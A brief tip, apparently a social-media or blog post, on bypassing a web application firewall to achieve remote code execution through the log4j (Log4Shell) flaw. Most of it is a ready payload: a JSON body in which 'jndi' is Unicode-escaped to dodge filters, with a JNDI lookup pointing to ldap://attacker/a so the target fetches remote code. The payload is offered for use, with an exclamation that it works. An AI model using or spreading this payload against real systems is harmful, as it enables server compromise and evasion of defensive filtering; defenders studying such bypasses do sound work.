Tips to bypass a WAF and get RCE with #log4j, if you have a request with a JSON body, replace your “jndi” with \u006a\u006e\u0064\u0069 in this way:
{
“var”: “${\u006a\u006e\u0064\u0069:ldap://attacker/a}”
}
It’s works!?
Subscribe for the latest news: